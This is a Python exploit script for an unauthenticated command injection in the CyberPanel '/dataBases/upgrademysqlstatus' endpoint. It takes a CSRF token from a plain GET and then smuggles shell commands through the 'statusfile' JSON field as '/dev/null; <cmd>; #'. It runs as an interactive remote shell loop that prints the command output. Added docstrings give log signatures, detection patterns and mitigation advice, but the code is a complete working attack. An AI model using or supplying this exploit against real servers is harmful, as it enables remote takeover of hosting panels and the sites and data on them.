CyberPanel upgrademysqlstatus Arbitrary Command Execution
import httpx
import sys
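def get_CSRF_token(client):
    """Fetch the site root and return the ``csrftoken`` cookie it sets.

    The listing as published used typographic quotes and had lost its
    indentation, so it did not parse; this version restores plain ASCII
    quoting and block structure without changing what is requested.

    Args:
        client: HTTP client exposing ``get(path)`` whose response has a
            ``cookies`` mapping (an ``httpx.Client`` in this script).

    Returns:
        The value of the ``csrftoken`` cookie from the response.

    Raises:
        KeyError: if the response carries no ``csrftoken`` cookie.

    Note for defenders: nothing in this script logs in. The token comes
    from a plain GET of "/" with no credentials, so the CSRF token on its
    own is not evidence of an authenticated session.
    """
    resp = client.get("/")
    return resp.cookies["csrftoken"]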
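def pwn(client, CSRF_token, cmd):
    """PUT the crafted JSON body to /dataBases/upgrademysqlstatus.

    The listing as published used typographic quotes and had lost its
    indentation, so it did not parse; quoting and structure are restored
    here and the request itself is unchanged.

    Args:
        client: HTTP client exposing ``base_url`` and ``put(...)``.
        CSRF_token: value sent both as the ``X-CSRFToken`` header and as
            the ``csrftoken`` field of the JSON body.
        cmd: text interpolated into the ``statusfile`` field.

    Returns:
        The ``requestStatus`` field of the JSON response.

    What the request shows about the flaw: ``statusfile`` is expected to
    be a file path, but the value sent is ``/dev/null; <cmd>; #``. For
    that to have any effect the server must place the field into a shell
    command line without quoting or validation (server code is not shown
    here, so this is inferred from the payload shape). The response field
    ``requestStatus`` is then printed by the caller as command output.

    Detection: PUT requests to ``/dataBases/upgrademysqlstatus`` whose
    JSON ``statusfile`` contains shell metacharacters (``;``, ``#``,
    ``|``, ``&``, ``$(``, backticks) or whitespace; a legitimate value
    would be a bare path. Since the script never authenticates, requests
    to this path from clients with no prior login are also worth alerting
    on.

    Mitigation: apply the vendor fix for this endpoint, and keep the
    panel's management interface reachable only from trusted addresses.
    """
    headers = {
        "X-CSRFToken": CSRF_token,
        "Content-Type": "application/json",
        # Referer is set to the panel's own base URL.
        "Referer": str(client.base_url),
    }
    # Body is assembled by plain string formatting, not a JSON encoder.
    payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)
    resp = client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload)
    return resp.json()["requestStatus"]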
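def exploit(client, cmd):
    """Obtain a CSRF token, send one request carrying ``cmd``, print the result.

    The listing as published had lost its indentation, so it did not
    parse; block structure is restored and the call sequence is unchanged.

    Args:
        client: HTTP client passed through to ``get_CSRF_token`` and ``pwn``.
        cmd: text passed through to ``pwn``.

    A fresh token is fetched on every call, so each command produces two
    requests in the panel's access log: a GET of "/" followed by a PUT to
    /dataBases/upgrademysqlstatus. That pairing, repeated from one source
    address, is a usable log signature.
    """
    CSRF_token = get_CSRF_token(client)
    stdout = pwn(client, CSRF_token, cmd)
    print(stdout)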
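# Entry point. The published listing used typographic quotes and had lost
# its indentation, so it did not parse; both are restored here.
if __name__ == "__main__":
    # Base URL of the panel is taken from the first command-line argument.
    target = sys.argv[1]
    # verify=False turns off TLS certificate verification in httpx, so the
    # server's identity is not checked for any request made by this client.
    client = httpx.Client(base_url=target, verify=False)
    # Each line read from stdin is sent as one request pair via exploit();
    # the loop has no exit condition of its own.
    while True:
        cmd = input("$> ")
        exploit(client, cmd)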